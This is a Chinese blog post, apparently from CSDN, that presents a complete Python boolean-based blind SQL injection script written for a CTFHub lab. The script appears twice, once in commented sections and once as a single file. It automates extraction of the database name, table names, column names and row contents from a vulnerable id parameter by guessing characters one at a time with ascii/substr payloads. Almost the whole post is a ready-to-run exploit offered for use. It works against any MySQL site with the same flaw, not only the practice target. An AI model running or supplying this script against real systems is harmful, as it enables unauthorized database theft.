Python-Boolean盲注脚本(附带注释,总脚本在结尾)

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: Python SQL注入 ctfhub 文章标签: python 后端 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/123171338
版权

SQL注入 自动化探测 数据库提取 盲注 HTTP请求
关键词由CSDN通过智能技术生成
Python 同时被 3 个专栏收录
24 篇文章 2 订阅
订阅专栏
SQL注入
13 篇文章 0 订阅
订阅专栏
ctfhub
10 篇文章 1 订阅
订阅专栏

靶场:CTFHub

设置重新连接,默认的情况下keep-alive为True

# -*- coding: UTF-8 -*-

import requests
import optparse  # 实现为脚本传递命令参数
import time

DBName = ""  # 数据库名的变量
DBTables = []
DBColumns = []
DBData = {}

flag = "query_success"  # 判断盲注Ture回显的特定内容
r1 = int(input('设置重连次数,一般为5按情况自行调整,连接活跃默认设置为False:'))
requests.adapters.DEFAULT_RETRIES = r1
conn = requests.session()
conn.keep_alive = False  # 设置重连次数(自行调整),连接活跃状态为False

跑数据库函数

def GetDBName(url):
    global DBName
    '''
    数据库名的长度
    '''
    print('[-]开始获取数据库名的长度')
    DBNameLen = 0  # 初始长度为0
    payload = "1 and if(length(database())={0},1,0)#"
    targetUrl = url + payload  # 调用函数后传递的url与payload拼接,下发targetUrl为最终请求url
    for DBNameLen in range(1,99):
        res = conn.get(targetUrl.format(DBNameLen))  # 实例化猜解;遍历从1到98;然后将遍历的数带入payload
        # if in判断返回,中文乱码pycharm编译器里编码设置成 -*- coding: UTF-8 -*-解决
        if flag in res.content.decode("utf-8"):
            print("[+]数据库长度:"+ str(DBNameLen))
            break
    '''
    数据库名
    '''
    print("[-]开始获取数据库名")
    payload = "1 and if(ascii(substr(database(),{0},1))={1},1,0)"
    targetUrl = url + payload
    # 遍历a,b于targetUrl,range从1,1开始
    for a in range(1,DBNameLen+1):
        for b in range(33,127):  # asc码33,126+1
            res = conn.get(targetUrl.format(a, b))
            if flag in res.content.decode("utf-8"):
                #自增,chr()会在range内的(就是0~255)整数作参数,返回一个对应的字符
                DBName += chr(b)
                print("[-]"+ DBName)
                break

表函数

def GetDBTables(url, dbname):
    global DBTables
    '''
    获取表的数量
    '''
    DBTableCount = 0  # 初始长度为0
    print("[-]开始获取{0}数据库表的数量".format(dbname))  # dbname=数据库
    payload = "1 and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0)"
    targetUrl = url + payload
    for DBTableCount in range(1, 99):  # 遍历获取数据库表的数量
        res = conn.get(targetUrl.format(dbname,DBTableCount))
        if flag in res.content.decode("utf-8"):
            print("[+]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
            break
    print("[-]开始获取{0}数据库的表".format(dbname))
    '''
    获取表的长度
    '''
    tableLen = 0
    # a表示当前正在获取表的索引
    for a in range(0, DBTableCount):
        print("[-]正在获取第{0}个表名".format(a + 1))
        for tableLen in range(1,99):
            # 进入遍历,获取表名的长度,{0}可以用database()代替
            payload = "1 and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname, a, tableLen))
            if flag in res.content.decode("utf-8"):
                break
        '''
        获取表名
        '''
        table = ""  # 获取表名
        # b表示当前表名猜解的位置
        for b in range(1, tableLen + 1):
            payload = "1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},1,0)"
            #  select table_name from information_schema.tables where table_schema='sqli' limit 1, 1 表名
            #  substr(表名,1,1) = x #  第一个表名的第一个字符
            #  ascii(字符) = y
            targetUrl = url + payload
            for c in range(33, 127):
                res = conn.get(targetUrl.format(dbname, a, b, c))
                if flag in res.content.decode("utf-8"):
                    table += chr(c)
                    print(table)
                    break

        DBTables.append(table)  # 将获取的表名加入DBTables后清空
        table = ""

字段函数

def GetDBColumns(url, dbname, dbtable):  # 此处的dbname和dbtable将在主函数时被调用
    global DBColumns
    '''
    获取表内字段数数量
    '''
    DBColumnCount = 0  # 初始为0
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(99):
        payload = "1 and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0)"  # 字段数
        targetUrl = url + payload
        res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))
        if flag in res.content.decode("utf-8"):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable,DBColumnCount))
            break
    '''
    # 根据字段数量跑字段名称
    '''
    column = ""
    # a表示当前获取字段的索引
    for a in range(0, DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(a+1))
        # 先获取字段的长度
        for columnLen in range(99):
            payload = "1 and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))
            if flag in res.content.decode("utf-8"):
                break
        for b in range(1,columnLen+1):
            payload = "1 and if(ascii(substr((select column_name from information_schema.columns where table_schema = '{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0)"
            targetUrl = url + payload
            # c表示在asc码中33~126位
            for c in range(33,127):
                res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))
                if flag in res.content.decode("utf-8"):
                    column += chr(c)
                    print(column)
                    break
        DBColumns.append(column)
        # 清空colimn,用来获取下一个字段名
        column = ""

字段内容函数

def GetDBData(url,dbtable,dbcolumn):
    global DBData
    '''
    获取表内字段的数据数量
    '''
    DBDataCount = 0
    try:
        print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable,dbcolumn))
        for DBDataCount in range(99):
            payload = "1 and if((slect count({0}) from {1})={2},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbcolumn,dbtable,DBDataCount))
            if flag in res.content.decode("utf-8"):
                print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable,dbcolumn,DBDataCount))
                break
        for a in range(0,DBDataCount):
            print("[-]正在获取{0}的第{1}个数据".format(dbcolumn,a+1))
            # 先获取这个数据的长度
            dataLen = 0
            for dataLen in range(99):
                payload = "1 and if((select length({0}) from {1} limit {2},1)={3},1,0)"
                targetUrl = url + payload
                res = conn.get(targetUrl.format(dbcolumn,dbtable,a,dataLen))
                if flag in res.content.decode("utf-8"):
                    print("[-]第{0}个数据长度为:{1}".format(a+1,dataLen))
                    break
            # 临时存放数据的具体内容
            data = ""
            # b表示当前数据内容猜解的位置
            for b in range(1,dataLen+1):
                for c in range(33,127):
                    payload = "1 and if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0)"
                    targetUrl = url + payload
                    res = conn.get(targetUrl.format(dbcolumn,dbtable,a,b,c))
                    if flag in res.content.decode("utf-8"):
                        data += chr(c)
                        print(data)
                        break
            DBData.setdefault(dbcolumn,[]).append(data)  # 当不存在dbcolumn时,增入[]
            print(DBData)
            # 清空
            data = ""
    except Exception as ganyu:
        print(f'完成;{dbcolumn}为最后一个字段内容;(如请求过快请再次请求)')

主函数

def StartSqli(url):  # 主函数
    GetDBName(url)  # 数据库函数,传入url
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)  # 表函数,传入url和数据库名
    print("[+]当前数据库{0}的表名如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看的表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])  # 字段函数,传入url、数据库名、表名
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看的字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

当前脚本运行,实现为脚本传递命令参数,%prog是optparse定义的格式化字符串符号,表示本程序的文件名,可填可不填

if __name__ == '__main__':
    parser = optparse.OptionParser('usage: python %prog -u url \n\n' 'Example:  python %prog -u http://challenge-2f81434032b5d77c.sandbox.ctfhub.com:10800/?id=')
    # 目标URL参数-u # dest:存取该选项参数的变量名,default:选项参数的默认值
    parser.add_option('-u', '--url', dest='targetURL',default='http://challenge-2f81434032b5d77c.sandbox.ctfhub.com:10800/?id=', type='string',help='target URL')
    (options, args) = parser.parse_args()
    StartSqli(options.targetURL)

总脚本

# -*- coding: UTF-8 -*-

import requests
import optparse  # 实现为脚本传递命令参数
import time

DBName = ""  # 数据库名的变量
DBTables = []
DBColumns = []
DBData = {}

flag = "query_success"  # 判断盲注Ture回显的特定内容
r1 = int(input('设置重连次数,一般为5按情况自行调整,连接活跃默认设置为False:'))
requests.adapters.DEFAULT_RETRIES = r1
conn = requests.session()
conn.keep_alive = False  # 设置重连次数(自行调整),连接活跃状态为False

# 数据库函数
def GetDBName(url):
    global DBName
    '''
    数据库名的长度
    '''
    print('[-]开始获取数据库名的长度')
    DBNameLen = 0  # 初始长度为0
    payload = "1 and if(length(database())={0},1,0)#"
    targetUrl = url + payload  # 调用函数后传递的url与payload拼接,下发targetUrl为最终请求url
    for DBNameLen in range(1,99):
        res = conn.get(targetUrl.format(DBNameLen))  # 实例化猜解;遍历从1到98;然后将遍历的数带入payload
        # if in判断返回,中文乱码pycharm编译器里编码设置成 -*- coding: UTF-8 -*-解决
        if flag in res.content.decode("utf-8"):
            print("[+]数据库长度:"+ str(DBNameLen))
            break
    '''
    数据库名
    '''
    print("[-]开始获取数据库名")
    payload = "1 and if(ascii(substr(database(),{0},1))={1},1,0)"
    targetUrl = url + payload
    # 遍历a,b于targetUrl,range从1,1开始
    for a in range(1,DBNameLen+1):
        for b in range(33,127):  # asc码33,126+1
            res = conn.get(targetUrl.format(a, b))
            if flag in res.content.decode("utf-8"):
                #自增,chr()会在range内的(就是0~255)整数作参数,返回一个对应的字符
                DBName += chr(b)
                print("[-]"+ DBName)
                break

# 表函数
def GetDBTables(url, dbname):
    global DBTables
    '''
    获取表的数量
    '''
    DBTableCount = 0  # 初始长度为0
    print("[-]开始获取{0}数据库表的数量".format(dbname))  # dbname=数据库
    payload = "1 and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0)"
    targetUrl = url + payload
    for DBTableCount in range(1, 99):  # 遍历获取数据库表的数量
        res = conn.get(targetUrl.format(dbname,DBTableCount))
        if flag in res.content.decode("utf-8"):
            print("[+]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
            break
    print("[-]开始获取{0}数据库的表".format(dbname))
    '''
    获取表的长度
    '''
    tableLen = 0
    # a表示当前正在获取表的索引
    for a in range(0, DBTableCount):
        print("[-]正在获取第{0}个表名".format(a + 1))
        for tableLen in range(1,99):
            # 进入遍历,获取表名的长度,{0}可以用database()代替
            payload = "1 and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname, a, tableLen))
            if flag in res.content.decode("utf-8"):
                break
        '''
        获取表名
        '''
        table = ""  # 获取表名
        # b表示当前表名猜解的位置
        for b in range(1, tableLen + 1):
            payload = "1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},1,0)"
            #  select table_name from information_schema.tables where table_schema='sqli' limit 1, 1 表名
            #  substr(表名,1,1) = x #  第一个表名的第一个字符
            #  ascii(字符) = y
            targetUrl = url + payload
            for c in range(33, 127):
                res = conn.get(targetUrl.format(dbname, a, b, c))
                if flag in res.content.decode("utf-8"):
                    table += chr(c)
                    print(table)
                    break

        DBTables.append(table)  # 将获取的表名加入DBTables后清空
        table = ""

# 字段函数
def GetDBColumns(url, dbname, dbtable):  # 此处的dbname和dbtable将在主函数时被调用
    global DBColumns
    '''
    获取表内字段数数量
    '''
    DBColumnCount = 0  # 初始为0
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(99):
        payload = "1 and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0)"  # 字段数
        targetUrl = url + payload
        res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))
        if flag in res.content.decode("utf-8"):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable,DBColumnCount))
            break
    '''
    # 根据字段数量跑字段名称
    '''
    column = ""
    # a表示当前获取字段的索引
    for a in range(0, DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(a+1))
        # 先获取字段的长度
        for columnLen in range(99):
            payload = "1 and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))
            if flag in res.content.decode("utf-8"):
                break
        for b in range(1,columnLen+1):
            payload = "1 and if(ascii(substr((select column_name from information_schema.columns where table_schema = '{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0)"
            targetUrl = url + payload
            # c表示在asc码中33~126位
            for c in range(33,127):
                res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))
                if flag in res.content.decode("utf-8"):
                    column += chr(c)
                    print(column)
                    break
        DBColumns.append(column)
        # 清空colimn,用来获取下一个字段名
        column = ""

# 字段内容函数
def GetDBData(url,dbtable,dbcolumn):
    global DBData
    '''
    获取表内字段的数据数量
    '''
    DBDataCount = 0
    try:
        print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable,dbcolumn))
        for DBDataCount in range(99):
            payload = "1 and if((slect count({0}) from {1})={2},1,0)"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbcolumn,dbtable,DBDataCount))
            if flag in res.content.decode("utf-8"):
                print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable,dbcolumn,DBDataCount))
                break
        for a in range(0,DBDataCount):
            print("[-]正在获取{0}的第{1}个数据".format(dbcolumn,a+1))
            # 先获取这个数据的长度
            dataLen = 0
            for dataLen in range(99):
                payload = "1 and if((select length({0}) from {1} limit {2},1)={3},1,0)"
                targetUrl = url + payload
                res = conn.get(targetUrl.format(dbcolumn,dbtable,a,dataLen))
                if flag in res.content.decode("utf-8"):
                    print("[-]第{0}个数据长度为:{1}".format(a+1,dataLen))
                    break
            # 临时存放数据的具体内容
            data = ""
            # b表示当前数据内容猜解的位置
            for b in range(1,dataLen+1):
                for c in range(33,127):
                    payload = "1 and if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0)"
                    targetUrl = url + payload
                    res = conn.get(targetUrl.format(dbcolumn,dbtable,a,b,c))
                    if flag in res.content.decode("utf-8"):
                        data += chr(c)
                        print(data)
                        break
            DBData.setdefault(dbcolumn,[]).append(data)  # 当不存在dbcolumn时,增入[]
            print(DBData)
            # 清空
            data = ""
    except Exception as ganyu:
        print(f'完成;{dbcolumn}为最后一个字段内容;(如请求过快请再次请求)')

# 主函数控制
def StartSqli(url):  # 主函数
    GetDBName(url)  # 数据库函数,传入url
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)  # 表函数,传入url和数据库名
    print("[+]当前数据库{0}的表名如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看的表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])  # 字段函数,传入url、数据库名、表名
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看的字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

# 当前脚本运行,实现为脚本传递命令参数,%prog是optparse定义的格式化字符串符号,表示本程序的文件名,可填可不填
if __name__ == '__main__':
    parser = optparse.OptionParser('usage: python %prog -u url \n\n' 'Example:  python %prog -u http://challenge-2f81434032b5d77c.sandbox.ctfhub.com:10800/?id=')
    # 目标URL参数-u # dest:存取该选项参数的变量名,default:选项参数的默认值
    parser.add_option('-u', '--url', dest='targetURL',default='http://challenge-2f81434032b5d77c.sandbox.ctfhub.com:10800/?id=', type='string',help='target URL')
    (options, args) = parser.parse_args()
    StartSqli(options.targetURL)

bbb07
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python脚本自动化注_Python SQL注脚
weixin_42181686的博客
02-11 345
Python SQL注脚本2018-11-30268基于布尔注#!/usr/bin/env pythonimport requests#dbs#SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA#tables#SELECT GROUP_CONCAT(table_NAME) FROM information_sche...
python-
qq_41232519的博客
04-22 387
import requests import time #目标url url = 'http://192.168.8.152/sql/Less-1/?id=1' #查库语句 database = 'select schema_name from information_schema.schemata' #查当前表语句 table = 'select table_name from infor...
2024年Python最全Python自动化sql注入:布尔注_布尔注脚
2301_82244514的博客
04-30 390
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
构造exp-Python注脚
告白的博客
08-12 450
0x00 搭建环境介绍 平常的注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造注exp,实现注入 手工注入测试: 0x01 利用python构造exp-注脚本 import requests def get_html(url): "我的功能判断页面内容是否
python布尔注的脚本
kiihuang的博客
03-28 492
使用python,编写一个可以自动爆破的布尔注脚本,根据不同情况调整里面的Content-Length的值。
python脚本之布尔
ro4lsc的博客
04-21 7130
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
Python编写注自动化脚本
qq_42990434的博客
05-14 1470
注入中注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚 本,来提高挖注的效率。 说到注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己注数据库名字的例子来说明一下: #!/usr/bin/env python # coding:utf-8 import requests import sys url = "http://xxx.xxx.xxx.xxx/xxx/xxx
python爱心代码高级python-boolean-algebra.rar
最新发布
05-20
在"高级Python-Boolean Algebra.rar"这个压缩包中,我们聚焦于一个特定的领域:布尔代数。布尔代数,或称为布尔逻辑,是数学的一个分支,它在计算机科学中扮演着至关重要的角色,特别是在逻辑电路设计、数据结构和...
布尔注python脚本.zip
12-28
布尔注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
mumuki-guia-python-logica-booleana-neutro
04-09
执照 此内容根据知识共享许可类似协议4.0分发。 版权所有Jessica Saavedra,Franco Bulgarelli,Gustavo Trucco及其贡献者此内容包括许多个人的自愿捐款。 有关确切的贡献历史记录,请参见其修订历史记录,为和...
python-boolean:一些方便的工具,用于解析布尔字符串,以及从布尔字符串获取最小乘积
04-27
python-boolean 在自由许可下,一些简洁的函数可以读取表示布尔表达式的字符串并返回各种方便的形式。 它使用进行繁重的解析,并使用George Prekas根据Robert Dick和Pat Maupin的代码(全部包含在qm.py )编写的...
使用Python脚本线上打包Android项目apk.zip
02-27
使用Python脚本线上打包Android项目apk.zip Usage 1.环境准备:配置好python(2.x或3.x)、gradle环境 2.将auto.py 和 auto.config 文件放在同一级目录下。 3.然后配置auto.config文件: Root_SDK_Dir 是你的SDK的...
Python-Sql注检测
weixin_57041250的博客
11-02 221
sql注分为布尔型注,时间型注。
python脚本实现半自动化布尔
weixin_44255856的博客
04-27 878
原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔注/ from optparse import OptionParser import sys import requests import hashlib parser=OptionParser() parser.add_option("-D", "--database", a...
Python之路 | 布尔注、延时EXP编写
IerkeU的博客
03-29 871
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
Python 安全开发 布尔注脚
YouthBelief的博客
12-03 1226
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
命令执行
灰太的表格的博客
06-11 741
命令执行注 想练练写脚本,就自己搭了个环境。是关于命令执行shell_exec注的。环境代码写的也是简陋版的。flag在文件flag里 这是1.php的内容: 打开页面是这样的: 然后自己花了十多分钟写的脚本: import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
基础的注脚
m0_57131590的博客
09-23 161
脚本只是一个单纯的遍历,没有用二分法,简单易懂。 import requests req = requests.Session() url='xxxx' result='' proxies={'http': 'xxx'}//方便调试 header={ "Cookie": "xxxx", "User-Agent": "xxxx", "Content-Type": "xxxx", "Origin": "xxxxx" } def baoshuju(url,proxies):
CTFhub布尔注脚
qq_41565526的博客
02-04 518
CTFhub布尔注脚
数据类型-Boolean
05-27
在编程中,Boolean通常用于条件语句和逻辑运算。例如,我们可以使用Boolean来表示一个条件是否为真,或者用它来判断两个条件的关系。在许多编程语言中,Boolean的值可以通过布尔运算(如与、或、非)来计算。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值